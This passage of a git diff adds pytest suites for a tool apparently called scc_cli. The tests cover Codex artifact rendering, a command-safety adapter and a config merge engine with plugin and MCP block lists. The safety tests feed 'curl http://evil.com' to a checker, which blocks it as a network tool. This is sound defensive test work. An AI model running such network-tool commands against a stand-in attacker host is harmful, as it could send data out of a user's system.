CODEX_CONFIG_DIR / "hooks.json").read_text()) + assert "bundle-a" in hooks["scc_managed"] + assert "bundle-b" in hooks["scc_managed"] + assert hooks["scc_managed"]["bundle-a"]["source"] == "./hooks-a.json" + assert hooks["scc_managed"]["bundle-b"]["source"] == "./hooks-b.json" + + def test_hooks_preserves_user_content_after_multi_bundle(self, workspace: Path) -> None: + """User content persists through multiple SCC-managed writes.""" + codex_dir = workspace / CODEX_CONFIG_DIR + codex_dir.mkdir(parents=True, exist_ok=True) + hooks_path = codex_dir / "hooks.json" + hooks_path.write_text(json.dumps({"my_hook": {"event": "save"}}) + "\n") + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"hooks": "./hooks-x.json"}, + ), + ), + ) + render_codex_artifacts(plan, workspace) + + hooks = json.loads(hooks_path.read_text()) + assert hooks["my_hook"]["event"] == "save" + assert "scc_managed" in hooks + + def test_plugin_manifest_has_managed_by_scc(self, workspace: Path) -> None: + """Plugin manifest includes managed_by=scc for identification.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"plugin_bundle": "./my-plugin"}, + ), + ), + ) + render_codex_artifacts(plan, workspace) + + plugin = json.loads((workspace / CODEX_PLUGIN_DIR / "plugin.json").read_text()) + assert plugin["managed_by"] == "scc" + + def test_rules_metadata_has_managed_by_scc(self, workspace: Path) -> None: + """Rules metadata includes managed_by=scc for identification.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"rules": "./rules/safety.rules"}, + ), + ), + ) + render_codex_artifacts(plan, workspace) + + rules = json.loads((workspace / CODEX_RULES_DIR / "safety.rules.json").read_text()) + assert rules["managed_by"] == "scc" + + def test_instructions_metadata_has_managed_by_scc(self, workspace: Path) -> None: + """Instructions metadata includes managed_by=scc for identification.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"instructions": "./AGENTS.md"}, + ), + ), + ) + render_codex_artifacts(plan, workspace) + + instr = json.loads( + (workspace / SCC_MANAGED_DIR / INSTRUCTIONS_SUBDIR / "AGENTS.json").read_text() + ) + assert instr["managed_by"] == "scc" + + def test_skill_metadata_has_managed_by_scc(self, workspace: Path) -> None: + """Skill metadata includes managed_by=scc for identification.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="skills/test", + ), + ), + ) + render_codex_artifacts(plan, workspace) + + skill = json.loads((workspace / SKILLS_DIR / "skills_test" / "skill.json").read_text()) + assert skill["managed_by"] == "scc" + + +# --------------------------------------------------------------------------- +# SCC section markers are exported (for callers doing AGENTS.md merge) +# --------------------------------------------------------------------------- + + +class TestSCCSectionMarkers: + """Verify that SCC section markers are available as module constants.""" + + def test_start_marker_exists(self) -> None: + assert "SCC-MANAGED START" in SCC_SECTION_START + + def test_end_marker_exists(self) -> None: + assert "SCC-MANAGED END" in SCC_SECTION_END + + def test_markers_are_comment_lines(self) -> None: + assert SCC_SECTION_START.startswith("#") + assert SCC_SECTION_END.startswith("#") + + +# --------------------------------------------------------------------------- +# _render_native_integration_binding — direct edge cases +# --------------------------------------------------------------------------- + + +class TestRenderNativeIntegrationDirect: + """Direct tests for _render_native_integration_binding edge cases.""" + + def test_empty_native_config_renders_nothing(self, workspace: Path) -> None: + """Binding with empty native_config but classified as native via + some external override → renders nothing, no crash.""" + binding = ProviderArtifactBinding( + provider="codex", + native_config={}, + ) + rendered, warnings = _render_native_integration_binding(binding, workspace, "empty-bundle") + assert rendered == [] + assert warnings == [] + + def test_unknown_config_keys_ignored(self, workspace: Path) -> None: + """Config keys outside _INTEGRATION_KEYS are silently ignored.""" + binding = ProviderArtifactBinding( + provider="codex", + native_config={"unknown_key": "some-value", "another": "val"}, + ) + rendered, warnings = _render_native_integration_binding( + binding, workspace, "unknown-bundle" + ) + assert rendered == [] + assert warnings == [] + + def test_hooks_bundle_id_scoping(self, workspace: Path) -> None: + """Each bundle gets its own key under scc_managed in hooks.json.""" + binding1 = ProviderArtifactBinding( + provider="codex", + native_config={"hooks": "./a.json"}, + ) + binding2 = ProviderArtifactBinding( + provider="codex", + native_config={"hooks": "./b.json"}, + ) + _render_native_integration_binding(binding1, workspace, "alpha") + _render_native_integration_binding(binding2, workspace, "beta") + + hooks = json.loads((workspace / CODEX_CONFIG_DIR / "hooks.json").read_text()) + assert hooks["scc_managed"]["alpha"]["source"] == "./a.json" + assert hooks["scc_managed"]["beta"]["source"] == "./b.json" + + +# --------------------------------------------------------------------------- +# Idempotent byte-level comparison +# --------------------------------------------------------------------------- + + +class TestIdempotentByteLevel: + """Stronger idempotency check: byte-level file content comparison.""" + + def test_skill_file_byte_identical_on_rerender(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="skills/review", + ), + ), + ) + render_codex_artifacts(plan, workspace) + first_bytes = (workspace / SKILLS_DIR / "skills_review" / "skill.json").read_bytes() + + render_codex_artifacts(plan, workspace) + second_bytes = (workspace / SKILLS_DIR / "skills_review" / "skill.json").read_bytes() + + assert first_bytes == second_bytes + + def test_plugin_file_byte_identical_on_rerender(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"plugin_bundle": "./plugin-src"}, + ), + ), + ) + render_codex_artifacts(plan, workspace) + first_bytes = (workspace / CODEX_PLUGIN_DIR / "plugin.json").read_bytes() + + render_codex_artifacts(plan, workspace) + second_bytes = (workspace / CODEX_PLUGIN_DIR / "plugin.json").read_bytes() + + assert first_bytes == second_bytes + + def test_mcp_fragment_identical_on_rerender(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="mcp-x", + transport_type="sse", + native_config={"url": "http://localhost:9090"}, + ), + ), + ) + r1 = render_codex_artifacts(plan, workspace) + r2 = render_codex_artifacts(plan, workspace) + assert json.dumps(r1.mcp_fragment, sort_keys=True) == json.dumps( + r2.mcp_fragment, sort_keys=True + ) + + +# --------------------------------------------------------------------------- +# MCP audit file: bundle_id sanitisation +# --------------------------------------------------------------------------- + + +class TestMCPAuditBundleIdSanitisation: + """Audit file names sanitise slashes in bundle_id.""" + + def test_slash_in_bundle_id_sanitised(self, workspace: Path) -> None: + plan = _plan( + bundle_id="org/my-bundle", + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="mcp-srv", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + audit_path = workspace / CODEX_CONFIG_DIR / ".scc-mcp-org_my-bundle.json" + assert audit_path.exists() + assert audit_path in result.rendered_paths + + def test_backslash_in_bundle_id_sanitised(self, workspace: Path) -> None: + plan = _plan( + bundle_id="org\\my-bundle", + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="mcp-srv", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + audit_path = workspace / CODEX_CONFIG_DIR / ".scc-mcp-org_my-bundle.json" + assert audit_path.exists() + assert audit_path in result.rendered_paths + + +# --------------------------------------------------------------------------- +# Portable artifact rendering (D023) +# --------------------------------------------------------------------------- + + +class TestPortableSkillRendering: + """D023: Portable skills without provider bindings are renderable.""" + + def test_portable_skill_writes_metadata(self, workspace: Path) -> None: + """Portable skill produces skill.json under .agents/skills/.""" + plan = _plan( + portable_artifacts=( + PortableArtifact( + name="code-review", + kind=ArtifactKind.SKILL, + source_type="git", + source_url="https://git.example.com/skills/code-review", + source_ref="v1.2.0", + version="1.2.0", + ), + ), + effective_artifacts=("code-review",), + ) + result = render_codex_artifacts(plan, workspace) + assert len(result.rendered_paths) == 1 + metadata_path = workspace / SKILLS_DIR / "code-review" / "skill.json" + assert metadata_path.exists() + data = json.loads(metadata_path.read_text()) + assert data["name"] == "code-review" + assert data["portable"] is True + assert data["provider"] == "codex" + assert data["bundle_id"] == "test-bundle" + assert data["source_type"] == "git" + assert data["source_url"] == "https://git.example.com/skills/code-review" + assert data["source_ref"] == "v1.2.0" + assert data["version"] == "1.2.0" + assert result.warnings == () + + def test_portable_skill_minimal_metadata(self, workspace: Path) -> None: + """Portable skill with no source metadata still writes file.""" + plan = _plan( + portable_artifacts=(PortableArtifact(name="minimal-skill", kind=ArtifactKind.SKILL),), + ) + result = render_codex_artifacts(plan, workspace) + assert len(result.rendered_paths) == 1 + data = json.loads(result.rendered_paths[0].read_text()) + assert data["name"] == "minimal-skill" + assert data["portable"] is True + assert "source_url" not in data + + def test_portable_skill_name_sanitized(self, workspace: Path) -> None: + """Skill name with slashes is sanitized for filesystem.""" + plan = _plan( + portable_artifacts=(PortableArtifact(name="org/team/skill", kind=ArtifactKind.SKILL),), + ) + result = render_codex_artifacts(plan, workspace) + assert len(result.rendered_paths) == 1 + assert "org_team_skill" in str(result.rendered_paths[0]) + + def test_portable_skill_materialization_error(self, workspace: Path) -> None: + """OSError during portable skill write raises MaterializationError.""" + block = workspace / SKILLS_DIR / "blocked-skill" + block.parent.mkdir(parents=True, exist_ok=True) + block.write_text("not-a-dir") + + plan = _plan( + portable_artifacts=(PortableArtifact(name="blocked-skill", kind=ArtifactKind.SKILL),), + ) + with pytest.raises(MaterializationError): + render_codex_artifacts(plan, workspace) + + +class TestPortableMcpRendering: + """D023: Portable MCP servers without provider bindings are renderable.""" + + def test_portable_mcp_with_url(self, workspace: Path) -> None: + """Portable MCP server with source_url → mcp_fragment entry.""" + plan = _plan( + portable_artifacts=( + PortableArtifact( + name="github-mcp", + kind=ArtifactKind.MCP_SERVER, + source_url="https://mcp.example.com/github", + source_ref="v2.0.0", + ), + ), + effective_artifacts=("github-mcp",), + ) + result = render_codex_artifacts(plan, workspace) + assert "mcpServers" in result.mcp_fragment + server = result.mcp_fragment["mcpServers"]["github-mcp"] + assert server["type"] == "sse" + assert server["url"] == "https://mcp.example.com/github" + assert server["portable"] is True + assert server["source_ref"] == "v2.0.0" + assert result.warnings == () + # Audit file should be written + assert len(result.rendered_paths) == 1 + + def test_portable_mcp_no_url_warns(self, workspace: Path) -> None: + """Portable MCP server with no source_url → warning.""" + plan = _plan( + portable_artifacts=( + PortableArtifact( + name="local-mcp", + kind=ArtifactKind.MCP_SERVER, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + assert len(result.warnings) == 1 + assert "no source_url" in result.warnings[0] + + def test_portable_mcp_version_in_config(self, workspace: Path) -> None: + """Version metadata propagates to mcp_fragment.""" + plan = _plan( + portable_artifacts=( + PortableArtifact( + name="versioned-mcp", + kind=ArtifactKind.MCP_SERVER, + source_url="https://mcp.example.com/v", + version="3.1.0", + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + server = result.mcp_fragment["mcpServers"]["versioned-mcp"] + assert server["version"] == "3.1.0" + + +class TestPortableMixedWithBindings: + """D023: Portable artifacts render alongside binding-based artifacts.""" + + def test_mixed_bindings_and_portable(self, workspace: Path) -> None: + """Plan with both bindings and portable artifacts renders both.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="bound-skill", + ), + ), + portable_artifacts=( + PortableArtifact( + name="portable-skill", + kind=ArtifactKind.SKILL, + source_type="git", + source_url="https://example.com/skill", + ), + ), + effective_artifacts=("bound-skill", "portable-skill"), + ) + result = render_codex_artifacts(plan, workspace) + assert len(result.rendered_paths) == 2 + paths_str = [str(p) for p in result.rendered_paths] + assert any("bound-skill" in p for p in paths_str) + assert any("portable-skill" in p for p in paths_str) + + def test_portable_mcp_merges_with_binding_mcp(self, workspace: Path) -> None: + """Portable MCP and binding MCP coexist in mcp_fragment.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="bound-mcp", + transport_type="sse", + native_config={"url": "https://bound.example.com"}, + ), + ), + portable_artifacts=( + PortableArtifact( + name="portable-mcp", + kind=ArtifactKind.MCP_SERVER, + source_url="https://portable.example.com", + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + mcp = result.mcp_fragment["mcpServers"] + assert "bound-mcp" in mcp + assert "portable-mcp" in mcp + assert mcp["bound-mcp"]["url"] == "https://bound.example.com" + assert mcp["portable-mcp"]["url"] == "https://portable.example.com" diff --git a/tests/test_codex_safety_adapter.py b/tests/test_codex_safety_adapter.py new file mode 100644 index 0000000..4b31fca --- /dev/null +++ b/tests/test_codex_safety_adapter.py @@ -0,0 +1,93 @@ +"""Unit tests for CodexSafetyAdapter.""" + +from __future__ import annotations + +from scc_cli.adapters.codex_safety_adapter import CodexSafetyAdapter +from scc_cli.core.contracts import SafetyPolicy, SafetyVerdict +from scc_cli.core.enums import SeverityLevel +from tests.fakes import FakeAuditEventSink +from tests.fakes.fake_safety_engine import FakeSafetyEngine + +_POLICY = SafetyPolicy() + + +def _make_adapter( + verdict: SafetyVerdict | None = None, +) -> tuple[CodexSafetyAdapter, FakeSafetyEngine, FakeAuditEventSink]: + engine = FakeSafetyEngine() + if verdict is not None: + engine.verdict = verdict + sink = FakeAuditEventSink() + return CodexSafetyAdapter(engine=engine, audit_sink=sink), engine, sink + + +class TestCheckCommandDelegatesToEngine: + def test_check_command_delegates_to_engine(self) -> None: + adapter, engine, _sink = _make_adapter() + adapter.check_command("curl http://evil.com", _POLICY) + + assert len(engine.calls) == 1 + cmd, policy = engine.calls[0] + assert cmd == "curl http://evil.com" + assert policy is _POLICY + + +class TestBlockedCommandEmitsWarningAuditEvent: + def test_blocked_command_emits_warning_audit_event(self) -> None: + blocked = SafetyVerdict( + allowed=False, + reason="network tool detected", + matched_rule="curl-blocked", + command_family="network-tool", + ) + adapter, _engine, sink = _make_adapter(verdict=blocked) + adapter.check_command("curl http://evil.com", _POLICY) + + assert len(sink.events) == 1 + event = sink.events[0] + assert event.severity == SeverityLevel.WARNING + assert event.event_type == "safety.check" + assert event.subject == "codex" + assert event.metadata["provider_id"] == "codex" + assert event.metadata["command"] == "curl http://evil.com" + assert event.metadata["verdict_allowed"] == "false" + assert event.metadata["matched_rule"] == "curl-blocked" + assert event.metadata["command_family"] == "network-tool" + + +class TestAllowedCommandEmitsInfoAuditEvent: + def test_allowed_command_emits_info_audit_event(self) -> None: + adapter, _engine, sink = _make_adapter() + adapter.check_command("echo hello", _POLICY) + + assert len(sink.events) == 1 + event = sink.events[0] + assert event.severity == SeverityLevel.INFO + assert event.metadata["verdict_allowed"] == "true" + assert event.metadata["matched_rule"] == "" + assert event.metadata["command_family"] == "" + + +class TestBlockedUserMessageFormat: + def test_blocked_user_message_format(self) -> None: + blocked = SafetyVerdict(allowed=False, reason="network tool detected") + adapter, _engine, _sink = _make_adapter(verdict=blocked) + result = adapter.check_command("curl http://evil.com", _POLICY) + + assert result.user_message == "[Codex] Command blocked: network tool detected" + + +class TestAllowedUserMessageFormat: + def test_allowed_user_message_format(self) -> None: + adapter, _engine, _sink = _make_adapter() + result = adapter.check_command("echo hello", _POLICY) + + assert result.user_message == "[Codex] Command allowed" + + +class TestAuditEmittedFlagIsTrue: + def test_audit_emitted_flag_is_true(self) -> None: + adapter, _engine, _sink = _make_adapter() + result = adapter.check_command("echo hello", _POLICY) + + assert result.audit_emitted is True diff --git a/tests/test_compute_effective_config_characterization.py b/tests/test_compute_effective_config_characterization.py new file mode 100644 index 0000000..898a036 --- /dev/null +++ b/tests/test_compute_effective_config_characterization.py @@ -0,0 +1,436 @@ +"""Characterization tests for application/compute_effective_config.py. + +Lock the current public API behavior of the config merge engine before +S02 surgery begins. Covers: pattern matching, delegation checks, +plugin/MCP filtering, network policy layering, session config merge, +and the full compute_effective_config pipeline. +""" + +from __future__ import annotations + +from scc_cli.application.compute_effective_config import EffectiveConfig as AppEffectiveConfig +from scc_cli.application.compute_effective_config import ( + compute_effective_config, + is_mcp_allowed, + is_network_mcp, + is_plugin_allowed, + is_project_delegated, + is_team_delegated_for_mcp, + is_team_delegated_for_plugins, + match_blocked_mcp, + matches_blocked, + matches_blocked_plugin, + matches_plugin_pattern, + mcp_candidates, + record_network_policy_decision, + validate_stdio_server, +) +from scc_cli.core.enums import MCPServerType + +# ═══════════════════════════════════════════════════════════════════════════════ +# Pattern matching helpers +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestMatchesBlocked: + """matches_blocked: casefold fnmatch on item vs patterns.""" + + def test_exact_match(self) -> None: + assert matches_blocked("evil-plugin", ["evil-plugin"]) == "evil-plugin" + + def test_wildcard_match(self) -> None: + assert matches_blocked("evil-plugin", ["evil-*"]) == "evil-*" + + def test_case_insensitive(self) -> None: + assert matches_blocked("Evil-Plugin", ["evil-plugin"]) == "evil-plugin" + + def test_no_match_returns_none(self) -> None: + assert matches_blocked("good-plugin", ["evil-*"]) is None + + def test_empty_patterns_returns_none(self) -> None: + assert matches_blocked("anything", []) is None + + def test_whitespace_stripped(self) -> None: + assert matches_blocked(" evil ", ["evil"]) == "evil" + + +class TestMatchesPluginPattern: + """matches_plugin_pattern: bare names match any marketplace.""" + + def test_exact_ref_match(self) -> None: + assert matches_plugin_pattern("tool@marketplace", "tool@marketplace") is True + + def test_bare_pattern_matches_any_marketplace(self) -> None: + assert matches_plugin_pattern("tool@marketplace", "tool") is True + + def test_bare_pattern_wildcard(self) -> None: + assert matches_plugin_pattern("my-tool@marketplace", "my-*") is True + + def test_no_match(self) -> None: + assert matches_plugin_pattern("tool@marketplace", "other") is False + + def test_empty_ref_returns_false(self) -> None: + assert matches_plugin_pattern("", "tool") is False + + def test_empty_pattern_returns_false(self) -> None: + assert matches_plugin_pattern("tool@mp", "") is False + + +class TestIsPluginAllowed: + """is_plugin_allowed: None means all allowed, empty means none allowed.""" + + def test_none_allowlist_allows_all(self) -> None: + assert is_plugin_allowed("anything@mp", None) is True + + def test_empty_allowlist_blocks_all(self) -> None: + assert is_plugin_allowed("anything@mp", []) is False + + def test_matching_pattern_allows(self) -> None: + assert is_plugin_allowed("tool@mp", ["tool"]) is True + + def test_non_matching_pattern_blocks(self) -> None: + assert is_plugin_allowed("other@mp", ["tool"]) is False + + +class TestMatchesBlockedPlugin: + """matches_blocked_plugin: plugin-aware pattern matching.""" + + def test_blocked_by_pattern(self) -> None: + assert matches_blocked_plugin("evil@mp", ["evil"]) == "evil" + + def test_not_blocked(self) -> None: + assert matches_blocked_plugin("good@mp", ["evil"]) is None + + +class TestMcpCandidates: + """mcp_candidates: collects name, url, domain, command for matching.""" + + def test_all_fields(self) -> None: + server = { + "name": "my-mcp", + "url": "https://example.com/api", + "command": "/usr/bin/mcp", + } + candidates = mcp_candidates(server) + assert "my-mcp" in candidates + assert "https://example.com/api" in candidates + assert "example.com" in candidates + assert "/usr/bin/mcp" in candidates + + def test_empty_server(self) -> None: + assert mcp_candidates({}) == [] + + def test_name_only(self) -> None: + candidates = mcp_candidates({"name": "simple"}) + assert candidates == ["simple"] + + +class TestIsMcpAllowed: + """is_mcp_allowed: checks all candidates against allowed patterns.""" + + def test_none_allows_all(self) -> None: + assert is_mcp_allowed({"name": "anything"}, None) is True + + def test_empty_blocks_all(self) -> None: + assert is_mcp_allowed({"name": "anything"}, []) is False + + def test_name_match_allows(self) -> None: + assert is_mcp_allowed({"name": "my-mcp"}, ["my-*"]) is True + + def test_no_match_blocks(self) -> None: + assert is_mcp_allowed({"name": "other"}, ["my-*"]) is False + + +class TestMatchBlockedMcp: + """match_blocked_mcp: returns matching pattern for blocked server.""" + + def test_blocked_by_name(self) -> None: + assert match_blocked_mcp({"name": "evil-mcp"}, ["evil-*"]) == "evil-*" + + def test_blocked_by_url(self) -> None: + result = match_blocked_mcp({"name": "ok", "url": "https://evil.com"}, ["*evil*"]) + assert result == "*evil*" + + def test_not_blocked(self) -> None: + assert match_blocked_mcp({"name": "good"}, ["evil-*"]) is None + + +class TestIsNetworkMcp: + """is_network_mcp: SSE and HTTP require network.""" + + def test_sse_requires_network(self) -> None: + assert is_network_mcp({"type": MCPServerType.SSE}) is True + + def test_http_requires_network(self) -> None: + assert is_network_mcp({"type": MCPServerType.HTTP}) is True + + def test_stdio_no_network(self) -> None: + assert is_network_mcp({"type": MCPServerType.STDIO}) is False + + def test_missing_type_no_network(self) -> None: + assert is_network_mcp({}) is False + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Delegation checks +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestDelegation: + """Delegation checks for plugins, MCP, and project overrides.""" + + def test_team_delegated_for_plugins_when_allowed(self) -> None: + org = {"delegation": {"teams": {"allow_additional_plugins": ["team-*"]}}} + assert is_team_delegated_for_plugins(org, "team-alpha") is True + + def test_team_not_delegated_for_plugins(self) -> None: + org = {"delegation": {"teams": {"allow_additional_plugins": []}}} + assert is_team_delegated_for_plugins(org, "team-alpha") is False + + def test_team_delegated_for_plugins_no_team_name(self) -> None: + org = {"delegation": {"teams": {"allow_additional_plugins": ["*"]}}} + assert is_team_delegated_for_plugins(org, None) is False + + def test_team_delegated_for_mcp_when_allowed(self) -> None: + org = {"delegation": {"teams": {"allow_additional_mcp_servers": ["team-*"]}}} + assert is_team_delegated_for_mcp(org, "team-alpha") is True + + def test_team_not_delegated_for_mcp(self) -> None: + org = {"delegation": {"teams": {"allow_additional_mcp_servers": []}}} + assert is_team_delegated_for_mcp(org, "team-alpha") is False + + def test_project_delegated_when_fully_enabled(self) -> None: + org = { + "delegation": {"projects": {"inherit_team_delegation": True}}, + "profiles": {"team-a": {"delegation": {"allow_project_overrides": True}}}, + } + allowed, reason = is_project_delegated(org, "team-a") + assert allowed is True + assert reason == "" + + def test_project_not_delegated_org_disabled(self) -> None: + org = {"delegation": {"projects": {"inherit_team_delegation": False}}} + allowed, reason = is_project_delegated(org, "team-a") + assert allowed is False + assert "inherit_team_delegation" in reason + + def test_project_not_delegated_team_disabled(self) -> None: + org = { + "delegation": {"projects": {"inherit_team_delegation": True}}, + "profiles": {"team-a": {"delegation": {"allow_project_overrides": False}}}, + } + allowed, reason = is_project_delegated(org, "team-a") + assert allowed is False + assert "allow_project_overrides" in reason + + def test_project_not_delegated_no_team(self) -> None: + org = {} + allowed, reason = is_project_delegated(org, None) + assert allowed is False + + +# ═══════════════════════════════════════════════════════════════════════════════ +# validate_stdio_server +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestValidateStdioServer: + """stdio MCP validation gates: feature gate, absolute path, prefix allowlist.""" + + def test_blocked_when_not_enabled(self) -> None: + result = validate_stdio_server( + {"command": "/usr/bin/mcp", "type": "stdio"}, + {"security": {"allow_stdio_mcp": False}}, + ) + assert result.blocked is True + assert "disabled" in result.reason + + def test_blocked_when_no_security_section(self) -> None: + result = validate_stdio_server({"command": "/usr/bin/mcp"}, {}) + assert result.blocked is True + + def test_blocked_for_relative_path(self) -> None: + result = validate_stdio_server( + {"command": "relative/mcp"}, + {"security": {"allow_stdio_mcp": True}}, + ) + assert result.blocked is True + assert "absolute" in result.reason + + def test_allowed_absolute_path_no_prefix_check(self) -> None: + result = validate_stdio_server( + {"command": "/usr/bin/mcp"}, + {"security": {"allow_stdio_mcp": True}}, + ) + assert result.blocked is False + + def test_warning_for_nonexistent_host_path(self) -> None: + result = validate_stdio_server( + {"command": "/nonexistent/path/to/mcp"}, + {"security": {"allow_stdio_mcp": True}}, + ) + assert result.blocked is False + assert any("not found" in w.lower() for w in result.warnings) + + +# ═══════════════════════════════════════════════════════════════════════════════ +# record_network_policy_decision +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestRecordNetworkPolicyDecision: + """record_network_policy_decision replaces any prior network_policy decision.""" + + def test_adds_decision(self) -> None: + result = AppEffectiveConfig() + record_network_policy_decision(result, policy="open", reason="test", source="test") + network_decisions = [d for d in result.decisions if d.field == "network_policy"] + assert len(network_decisions) == 1 + assert network_decisions[0].value == "open" + + def test_replaces_prior_decision(self) -> None: + result = AppEffectiveConfig() + record_network_policy_decision(result, policy="first", reason="a", source="a") + record_network_policy_decision(result, policy="second", reason="b", source="b") + network_decisions = [d for d in result.decisions if d.field == "network_policy"] + assert len(network_decisions) == 1 + assert network_decisions[0].value == "second" + + +# ═══════════════════════════════════════════════════════════════════════════════ +# compute_effective_config — full pipeline +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestComputeEffectiveConfig: + """End-to-end merge: org defaults → team overrides → project overrides.""" + + def test_empty_org_returns_empty_result(self) -> None: + result = compute_effective_config({}, None) + assert len(result.plugins) == 0 + assert len(result.mcp_servers) == 0 + assert result.network_policy is None + + def test_org_defaults_populate_plugins(self) -> None: + org = {"defaults": {"enabled_plugins": ["plugin-a@mp", "plugin-b@mp"]}} + result = compute_effective_config(org, None) + assert "plugin-a@mp" in result.plugins + assert "plugin-b@mp" in result.plugins + + def test_security_blocked_plugins_removed(self) -> None: + org = { + "defaults": {"enabled_plugins": ["good@mp", "evil@mp"]}, + "security": {"blocked_plugins": ["evil*"]}, + } + result = compute_effective_config(org, None) + assert "good@mp" in result.plugins + assert "evil@mp" not in result.plugins + assert any(b.item == "evil@mp" for b in result.blocked_items) + + def test_org_default_network_policy(self) -> None: + org = {"defaults": {"network_policy": "open"}} + result = compute_effective_config(org, None) + assert result.network_policy == "open" + + def test_team_overrides_network_policy_when_more_restrictive(self) -> None: + org = { + "defaults": {"network_policy": "open"}, + "profiles": {"team-a": {"network_policy": "locked-down-web"}}, + } + result = compute_effective_config(org, "team-a") + assert result.network_policy == "locked-down-web" + + def test_team_plugins_added_when_delegated(self) -> None: + org = { + "delegation": {"teams": {"allow_additional_plugins": ["team-a"]}}, + "profiles": {"team-a": {"additional_plugins": ["extra@mp"]}}, + } + result = compute_effective_config(org, "team-a") + assert "extra@mp" in result.plugins + + def test_team_plugins_denied_when_not_delegated(self) -> None: + org = { + "delegation": {"teams": {"allow_additional_plugins": []}}, + "profiles": {"team-a": {"additional_plugins": ["extra@mp"]}}, + } + result = compute_effective_config(org, "team-a") + assert "extra@mp" not in result.plugins + assert any(d.item == "extra@mp" for d in result.denied_additions) + + def test_project_plugins_added_when_fully_delegated(self) -> None: + org = { + "delegation": { + "teams": {"allow_additional_plugins": ["team-a"]}, + "projects": {"inherit_team_delegation": True}, + }, + "profiles": {"team-a": {"delegation": {"allow_project_overrides": True}}}, + } + project = {"additional_plugins": ["proj-plugin@mp"]} + result = compute_effective_config(org, "team-a", project_config=project) + assert "proj-plugin@mp" in result.plugins + + def test_project_plugins_denied_when_no_delegation(self) -> None: + org = {"delegation": {"projects": {"inherit_team_delegation": False}}} + project = {"additional_plugins": ["proj-plugin@mp"]} + result = compute_effective_config(org, "team-a", project_config=project) + assert "proj-plugin@mp" not in result.plugins + assert any(d.item == "proj-plugin@mp" for d in result.denied_additions) + + def test_session_config_org_default(self) -> None: + org = {"defaults": {"session": {"timeout_hours": 8, "auto_resume": True}}} + result = compute_effective_config(org, None) + assert result.session_config.timeout_hours == 8 + assert result.session_config.auto_resume is True + + def test_session_config_team_override(self) -> None: + org = { + "defaults": {"session": {"timeout_hours": 8}}, + "profiles": {"team-a": {"session": {"timeout_hours": 4}}}, + } + result = compute_effective_config(org, "team-a") + assert result.session_config.timeout_hours == 4 + + def test_team_mcp_server_added_when_delegated(self) -> None: + org = { + "delegation": {"teams": {"allow_additional_mcp_servers": ["team-a"]}}, + "profiles": { + "team-a": { + "additional_mcp_servers": [ + { + "name": "my-mcp", + "type": MCPServerType.SSE, + "url": "https://mcp.example.com", + } + ] + } + }, + } + result = compute_effective_config(org, "team-a") + assert any(s.name == "my-mcp" for s in result.mcp_servers) + + def test_team_mcp_server_denied_when_not_delegated(self) -> None: + org = { + "delegation": {"teams": {"allow_additional_mcp_servers": []}}, + "profiles": {"team-a": {"additional_mcp_servers": [{"name": "my-mcp", "type": "sse"}]}}, + } + result = compute_effective_config(org, "team-a") + assert not any(s.name == "my-mcp" for s in result.mcp_servers) + + def test_disabled_plugins_excluded(self) -> None: + org = { + "defaults": { + "enabled_plugins": ["a@mp", "b@mp"], + "disabled_plugins": ["b@mp"], + } + } + result = compute_effective_config(org, None) + assert "a@mp" in result.plugins + assert "b@mp" not in result.plugins + + def test_decisions_tracked(self) -> None: + org = {"defaults": {"enabled_plugins": ["p@mp"]}} + result = compute_effective_config(org, None) + plugin_decisions = [d for d in result.decisions if d.field == "plugins"] + assert len(plugin_decisions) == 1 + assert plugin_decisions[0].value == "p@mp" + assert plugin_decisions[0].source == "org.defaults" diff --git a/tests/test_config_commands_characterization.py b/tests/test_config_commands_characterization.py new file mode 100644 index 0000000..e864778 --- /dev/null +++ b/tests/test_config_commands_characterization.py @@ -0,0 +1,126 @@ +"""Characterization tests for commands/config.py. + +Lock current behavior of pure helper functions: enforcement status +entry construction, serialization, and advisory warning collection. +""" + +from __future__ import annotations + +from pathlib import Path +from unittest.mock import patch + +from scc_cli.commands.config import ( + EnforcementStatusEntry, + _collect_advisory_warnings, + _serialize_enforcement_status_entries, +) + +# ═══════════════════════════════════════════════════════════════════════════════ +# EnforcementStatusEntry +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestEnforcementStatusEntry: + """Frozen dataclass for enforcement display.""" + + def test_construction(self) -> None: + entry = EnforcementStatusEntry( + surface="plugins", + status="enforced", + detail="All plugins validated", + ) + assert entry.surface == "plugins" + assert entry.status == "enforced" + assert entry.detail == "All plugins validated" + + +class TestSerializeEnforcementStatusEntries: + """Serialization for JSON output.""" + + def test_empty_list(self) -> None: + assert _serialize_enforcement_status_entries([]) == [] + + def test_single_entry(self) -> None: + entries = [ + EnforcementStatusEntry( + surface="network_policy", + status="active", + detail="Proxy configured", + ) + ] + result = _serialize_enforcement_status_entries(entries) + assert len(result) == 1 + assert result[0]["surface"] == "network_policy" + assert result[0]["status"] == "active" + assert result[0]["detail"] == "Proxy configured" + + def test_multiple_entries(self) -> None: + entries = [ + EnforcementStatusEntry("a", "active", "detail-a"), + EnforcementStatusEntry("b", 